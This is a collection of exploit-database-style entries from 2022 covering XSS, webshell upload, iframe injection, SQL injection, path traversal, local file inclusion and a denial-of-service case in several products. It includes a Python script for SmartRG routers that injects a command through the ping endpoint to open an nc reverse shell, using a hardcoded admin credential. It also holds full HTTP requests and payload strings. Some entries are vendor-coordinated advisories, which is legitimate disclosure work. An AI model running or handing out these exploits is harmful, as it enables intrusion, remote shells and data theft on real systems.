<pre><code><br />ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS<br /><br /><br />Vendor: ETAP Lighting International NV<br />Product web page: https://www.etaplighting.com<br />Affected version: 1.0.0.32<br /><br />Summary: The ETAP Safety Manager (ESM) is a central managing and control<br />system that helps you to monitor, adjust and maintain your emergency lighting<br />system. Therefore each luminaire connected to your ESM network is given a<br />unique code. The ESM can easily identify the luminaires individually and<br />automatically report whether all luminaires work properly. You can either<br />choose between a wired or wireless network, or a combination of both. With<br />ESM you will not only manage your self contained or your centrally supplied<br />&#8216;ETAP Battery System&#8217; (EBS) emergency luminaires&#8217;, but also DALI emergency<br />units and K9 LED modules, which you can build into your luminaires. Since<br />your ESM system is connected to the Internet, you will always have access<br />to it through the World Wide Web. ESMweb&#8482; is an &#8216;embedded web server&#8217;<br />application for monitoring an emergency lighting system, which runs in the<br />&#8216;ESM web controller&#8217;. The ESMweb&#8482; application can be accessed from any PC<br />in the corporate network or connected to the Internet - by a standard web<br />browser.<br /><br />Desc: Input passed to the GET parameter &#39;action&#39; is not properly sanitised<br />before being returned to the user. This can be exploited to execute arbitrary<br />HTML/JS code in a user&#39;s browser session in context of an affected site.<br /><br />Tested on: Apache/2.4.41 (Ubuntu)<br /><br /><br />Vulnerability discovered by Gjoko &#39;LiquidWorm&#39; Krstic<br /> &#64;zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5711<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5711.php<br /><br /><br />22.08.2022<br /><br />--<br /><br /><br />PoC:<br /><br />GET /json/authenticate.php?action&#61;&#91;XSS&#93;&amp;username&#61;waddup&amp;password&#61;nm HTTP/1.1<br /><br />&#123;&quot;success&quot;:false,&quot;errorMessage&quot;:&quot;Invalid command: &#36;&quot;,&quot;errorCode&quot;:0,&quot;errorInfo&quot;:&quot;\/var\/www\/etap-root\/scripts\/class.dispatch.php(39)&quot;,&quot;rows&quot;:&#91;&#93;&#125;<br /></code></pre>

<pre><code># Exploit Title: Infix LMS - Learning Management System Shell Upload<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608<br /># Version: 4.3.0<br /># Tested on Ubuntu 18.04<br />sign up as teacher<br />go profile page and try to upload profile pic<br />with bypass name restriction on post request with burp or etc, upload b374k with burp or else <br /><br />-------Request-----------<br />POST /profile-update HTTP/1.1<br />Host: localhost<br />Content-Length: 102201<br />Cache-Control: max-age&#61;0<br />sec-ch-ua: &quot;Chromium&quot;;v&#61;&quot;103&quot;, &quot;.Not/A)Brand&quot;;v&#61;&quot;99&quot;<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: &quot;Linux&quot;<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary&#61;----WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q&#61;0.9,image/avif,image/webp,image/apng,&#42;/&#42;;q&#61;0.8,application/signed-exchange;v&#61;b3;q&#61;0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/profile-settings<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q&#61;0.9<br />Cookie: XSRF-TOKEN&#61;eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session&#61;eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3D<br />Connection: close<br /><br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;_token&quot;<br /><br />0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;name&quot;<br /><br />Teacher<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;email&quot;<br /><br />teacher&#64;infixedu.com<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;phone&quot;<br /><br />01711223345<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;country&quot;<br /><br />19<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;city&quot;<br /><br />1374<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;zip&quot;<br /><br /><br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;currency&quot;<br /><br />112<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;language&quot;<br /><br />19<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;facebook&quot;<br /><br /><br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;twitter&quot;<br /><br /><br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;linkedin&quot;<br /><br /><br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;instagram&quot;<br /><br /><br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;short_details&quot;<br /><br />Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&#39;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;about&quot;<br /><br />Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&#39;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;files&quot;; filename&#61;&quot;&quot;<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC<br />Content-Disposition: form-data; name&#61;&quot;image&quot;; filename&#61;&quot;shell.php.jpg.php&quot;<br />Content-Type: image<br />------b374kshell content-----<br /><br />------WebKitFormBoundaryzjX6L4V6hVC4KIEC--<br /></code></pre>

<pre><code># Exploit Title: Infix LMS - Learning Management System IFRAME Injection<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608<br /># Version: 4.3.0<br /># Tested on Ubuntu 18.04<br />sign up as teacher<br />go course page and try to add course or edit<br />with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field<br /><br />--request--<br />POST /admin/course/updateCourse HTTP/1.1<br />Host: localhost<br />Content-Length: 3855<br />Cache-Control: max-age&#61;0<br />sec-ch-ua: &quot;Chromium&quot;;v&#61;&quot;103&quot;, &quot;.Not/A)Brand&quot;;v&#61;&quot;99&quot;<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: &quot;Linux&quot;<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary&#61;----WebKitFormBoundarydcMGShie2VwdqOn2<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q&#61;0.9,image/avif,image/webp,image/apng,&#42;/&#42;;q&#61;0.8,application/signed-exchange;v&#61;b3;q&#61;0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/admin/course/course-details/7?type&#61;courseDetails<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q&#61;0.9<br />Cookie: XSRF-TOKEN&#61;eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session&#61;eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D<br />Connection: close<br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;_token&quot;<br /><br />0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;type&quot;<br /><br />1<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;drip&quot;<br /><br />0<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;title&quot;<br /><br />Introduction to Programming and App Development<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;id&quot;<br /><br />7<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;requirements&quot;<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;files&quot;; filename&#61;&quot;&quot;<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;about&quot;<br /><br />&lt;p&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;/p&gt;&lt;p&gt;&lt;p&gt;&lt;iframe src&#61;&quot;http://192.168.1.18:3000/uploads/test.html&quot;&gt;&lt;/p&gt;&lt;/p&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&#39;s standard dummy text<br /> ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book&lt;/p&gt;<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;files&quot;; filename&#61;&quot;&quot;<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;outcomes&quot;<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;files&quot;; filename&#61;&quot;&quot;<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;category&quot;<br /><br />4<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;sub_category&quot;<br /><br />7<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;mode_of_delivery&quot;<br /><br />1<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;quiz&quot;<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;level&quot;<br /><br />2<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;language&quot;<br /><br />19<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;duration&quot;<br /><br />10<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;complete_order&quot;<br /><br />0<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;price&quot;<br /><br />20<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;is_discount&quot;<br /><br />1<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;discount_price&quot;<br /><br />10<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;host&quot;<br /><br />Youtube<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;trailer_link&quot;<br /><br />https://www.youtube.com/watch?v&#61;mlqWUqVZrHA<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;vimeo&quot;<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;vdocipher&quot;<br /><br />https://www.youtube.com/watch?v&#61;mlqWUqVZrHA<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;file&quot;; filename&#61;&quot;&quot;<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;scope&quot;<br /><br />1<br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;image&quot;; filename&#61;&quot;&quot;<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;meta_keywords&quot;<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2<br />Content-Disposition: form-data; name&#61;&quot;meta_description&quot;<br /><br /><br />------WebKitFormBoundarydcMGShie2VwdqOn2--<br /><br /></code></pre>

<pre><code># Exploit Title: SmartRG Router - Remote Code Execution<br /># Date: 13/06/2022<br /># Exploit Author: Yerodin Richards<br /># Vendor Homepage: https://adtran.com<br /># Version: 2.5.15 / 2.6.13 (confirmed)<br /># Tested on: SR506n (2.5.15) &amp; SR510n (2.6.13)<br /># CVE : CVE-2022-37661<br /><br />import requests<br />from subprocess import Popen, PIPE<br /><br />router_host &#61; &quot;http://192.168.1.1&quot;<br />authorization_header &#61; &quot;YWRtaW46QWRtMW5ATDFtMyM&#61;&quot;<br /><br />lhost &#61; &quot;lo&quot;<br />lport &#61; 80<br /><br />payload_port &#61; 81<br /><br /><br />def main():<br /> e_proc &#61; Popen(&#91;&quot;echo&quot;, f&quot;rm /tmp/s &amp; mknod /tmp/s p &amp; /bin/sh 0&lt; /tmp/s &#124; nc &#123;lhost&#125; &#123;lport&#125; &gt; /tmp/s&quot;&#93;, stdout&#61;PIPE)<br /> Popen(&#91;&quot;nc&quot;, &quot;-nlvp&quot;, f&quot;&#123;payload_port&#125;&quot;&#93;, stdin&#61;e_proc.stdout)<br /> send_payload(f&quot;&#124;nc &#123;lhost&#125; &#123;payload_port&#125;&#124;sh&quot;)<br /> print(&quot;done.. check shell&quot;)<br /><br /><br />def get_session():<br /> url &#61; router_host + &quot;/admin/ping.html&quot;<br /> headers &#61; &#123;&quot;Authorization&quot;: &quot;Basic &#123;&#125;&quot;.format(authorization_header)&#125;<br /> r &#61; requests.get(url, headers&#61;headers).text<br /> i &#61; r.find(&quot;&amp;sessionKey&#61;&quot;) + len(&quot;&amp;sessionKey&#61;&quot;)<br /> s &#61; &quot;&quot;<br /> while r&#91;i&#93; !&#61; &quot;&#39;&quot;:<br /> s &#61; s + r&#91;i&#93;<br /> i &#61; i + 1<br /> return s<br /><br /><br />def send_payload(payload):<br /> print(payload)<br /> url &#61; router_host + &quot;/admin/pingHost.cmd&quot;<br /> headers &#61; &#123;&quot;Authorization&quot;: &quot;Basic &#123;&#125;&quot;.format(authorization_header)&#125;<br /> params &#61; &#123;&quot;action&quot;: &quot;add&quot;, &quot;targetHostAddress&quot;: payload, &quot;sessionKey&quot;: get_session()&#125;<br /> requests.get(url, headers&#61;headers, params&#61;params).text<br /><br /><br />main()<br /></code></pre>

<pre><code>sagemath 9.0 and reportedly later on ubuntu 20.<br /><br />sagemath gives access to the python interpreter,<br />so code execution is trivial.<br /><br />We give DoS attacks, which terminates the sagemath process<br />with abort(), when raising symbolic expression to large integer power.<br /><br />We get abort() with stack:<br /><br />gmp: overflow in mpz type<br /><br />#6 0x00007f55c83ee72e in __GI_abort () at<br />/build/glibc-SzIz7B/glibc-2.31/stdlib/abort.c:79<br />#7 0x00007f55c56e0d20 in __gmpz_realloc ()<br />#8 0x00007f55c56dd2b0 in __gmpz_n_pow_ui ()<br />#9 0x0000000000000000 in GiNaC::numeric::power(long) const ()<br />#10 0x0000000000000000 in GiNaC::numeric::pow_intexp(GiNaC::numeric<br />const&amp;) const ()<br /><br />The non-minimal testcase<br />&#61;&#61;&#61;<br />#sagemath code, copyright Georgi Guninski<br /><br />def binnk3u(n,k): return ( (n/k)&#42;&#42;(k))<br />n1&#61;(2&#42;10&#42;&#42;3);d0&#61;29004853178239;n0&#61;SR(log(n1));<br />tt&#61;binnk3u(n0+d0-1,d0);<br />print(&quot;passed :(&quot;)<br />&#61;&#61;&#61;<br /><br /></code></pre>

<pre><code>Title:<br />&#61;&#61;&#61;&#61;&#61;&#61;<br />AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal<br /><br />Author:<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />Jens Regel, CRISEC IT-Security<br /><br />CVE:<br />&#61;&#61;&#61;&#61;<br />CVE-2022-23854<br /><br />Advisory:<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal/<br /><br />Timeline:<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />25.06.2021 Vulnerability discovered<br />25.06.2021 Send details to custfirstsupport&#64;aveva.com<br />21.09.2021 Vendor response, fix is available until Q1/2022<br />25.09.2021 Vendor released Tech Alert TA000022335<br />06.09.2022 Public disclosure<br /><br />Vendor:<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />AVEVA Group plc is a marine and plant engineering IT company <br />headquartered in Cambridge, England. AVEVA software is used in many <br />sectors, including on- and off-shore oil and gas processing, chemicals, <br />pharmaceuticals, nuclear and conventional power generation, nuclear fuel <br />reprocessing, recycling and shipbuilding (https://www.aveva.com).<br /><br />Affected Products:<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />InTouch Access Anywhere Secure Gateway versions 2020 R2 and older<br /><br />Details:<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />A security vulnerability exists in InTouch Access Anywhere Secure <br />Gateway versions 2020 R2 and older. This is a Relative Path Traversal <br />vulnerability which allows an unauthenticated user with network access <br />to the Secure Gateway to read files on the system outside of the Secure <br />Gateway web server.<br /><br />Proof of Concept:<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />GET <br />/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini <br />HTTP/1.1<br /><br />HTTP/1.1 200 OK<br />Server: EricomSecureGateway/8.4.0.26844.&#42;<br />(..)<br /><br />; for 16-bit app support<br />&#91;fonts&#93;<br />&#91;extensions&#93;<br />&#91;mci extensions&#93;<br />&#91;files&#93;<br />&#91;Mail&#93;<br />MAPI&#61;1<br /><br />Fix:<br />&#61;&#61;&#61;&#61;<br />InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix<br />InTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix<br /><br /></code></pre>

<pre><code>## Title: ONLINE-NOTICE-BOARD-2022 SQLi<br />## Author: nu11secur1ty<br />## Date: 09.09.2022<br />## Vendor: https://www.sourcecodester.com/users/razormist<br />## Software: https://www.sourcecodester.com/php/14317/online-notice-board-system.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2022/ONLINE-NOTICE-BOARD-2022<br /><br />## Description:<br />The &#96;e&#96; parameter from the ONLINE-NOTICE-BOARD-2022 system appears to<br />be vulnerable to SQL injection attacks.<br />The malicious user can dump-steal the database, from this system and<br />he can use it for very malicious purposes.<br />NOTE: The users of this system are NOT protected, this SQL<br />vulnerability is CRITICAL!<br /><br />STATUS: HIGH Vulnerability<br /><br />&#91;+&#93;Payload:<br />&#96;&#96;&#96;mysql<br />---<br />Parameter: e (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: e&#61;MfbByvbe&#64;glupakarazormist.net&#39; OR NOT 5051&#61;5051#<br />Wypj&amp;p&#61;h8F!c4q!L9&amp;save&#61;Login<br /><br /> Type: error-based<br /> Title: MySQL &gt;&#61; 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: e&#61;MfbByvbe&#64;glupakarazormist.net&#39; OR (SELECT 8344<br />FROM(SELECT COUNT(&#42;),CONCAT(0x716b626b71,(SELECT<br />(ELT(8344&#61;8344,1))),0x7170767171,FLOOR(RAND(0)&#42;2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# ZBOm&amp;p&#61;h8F!c4q!L9&amp;save&#61;Login<br /><br /> Type: time-based blind<br /> Title: MySQL &gt;&#61; 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: e&#61;MfbByvbe&#64;glupakarazormist.net&#39; AND (SELECT 8661 FROM<br />(SELECT(SLEEP(5)))LTGu)# mWpk&amp;p&#61;h8F!c4q!L9&amp;save&#61;Login<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 10 columns<br /> Payload: e&#61;MfbByvbe&#64;glupakarazormist.net&#39; UNION ALL SELECT<br />NULL,CONCAT(0x716b626b71,0x4949414c667070706f614c784d7468616265424b595148715870516c437744516473687567795478,0x7170767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&amp;p&#61;h8F!c4q!L9&amp;save&#61;Login<br />---<br /><br />&#96;&#96;&#96;<br /><br />## Reproduce:<br />&#91;href&#93;(https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2022/ONLINE-NOTICE-BOARD-2022)<br /><br />## Proof and Exploit:<br />&#91;href&#93;(https://streamable.com/4u9diy)<br /><br /></code></pre>

<pre><code># Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS<br /># Date: Sep 8, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage:<br />https://apps.apple.com/us/developer/haw-yuan-yang/id291212805<br /># Software Link:<br />https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033<br /># Version: 1.4.0<br /># Tested on: iPhone ios 15.6<br /><br /><br />poc:<br /><br />http://192.168.1.187:8080/list?path&#61;%3Cscript%3Ealert(%271%27);%3C/script%3E<br /></code></pre>

<pre><code># Exploit Title: AirDisk 7.5.5 File Manager Stored XSS<br /># Date: Sep 8, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424<br /># Software Link:<br />https://apps.apple.com/us/app/airdisk-file-manager/id566530748<br /># Version: 7.5.5<br /># Tested on: iPhone ios 15.6<br /><br />1/ Starting the server ( File Transfer &gt; Wi-fi File Transfer )<br /><br />2/ Go to browser<br /><br />3/ Enter the address showing on app eg: http://192.168.1.187:8080<br /><br />4/ Create a folder with the name: rose&#39;&quot;&gt;&lt;img src&#61;x<br />onerror&#61;alert(document.location)&gt;<br /><br />5/ Refresh.<br /></code></pre>

<pre><code># Exploit Title: &#64;Drive 2.8 Local File inclusion<br /># Date: Sep 8, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://evolutive.co/<br /># Software Link: https://apps.apple.com/us/app/drive/id578982909<br /># Version: 2.8<br /># Tested on: iPhone ios 15.6<br /><br />GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1<br />Host: 192.168.1.187<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)<br />AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e<br />Safari/8536.25<br />Accept: &#42;/&#42;<br />Referer: http://192.168.1.187/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q&#61;0.9<br />Connection: close<br /><br /><br />--------<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/octet-stream<br />Content-Length: 213<br />Accept-Ranges: bytes<br />Date: Thu, 08 Sep 2022 14:26:16 GMT<br /><br />##<br /># Host Database<br />#<br /># localhost is used to configure the loopback interface<br /># when the system is booting. Do not change this entry.<br />##<br />127.0.0.1 localhost<br />255.255.255.255 broadcasthost<br />::1 localhost<br /></code></pre>